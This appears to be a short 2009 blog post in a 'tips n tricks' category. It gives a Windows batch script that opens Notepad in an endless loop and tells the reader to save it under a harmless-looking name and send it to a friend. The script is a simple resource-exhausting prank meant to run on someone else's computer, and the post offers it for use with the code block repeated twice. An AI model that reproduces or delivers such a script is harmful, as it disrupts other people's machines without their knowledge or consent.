Open Notepad continually in your friend's computer:
6/04/2009 06:16:00 AM Posted In tips n tricks Edit This 0 Comments »
Open Notepad continually in your friend's computer:
Type :
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
Type :
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
0 comments:
Post a Comment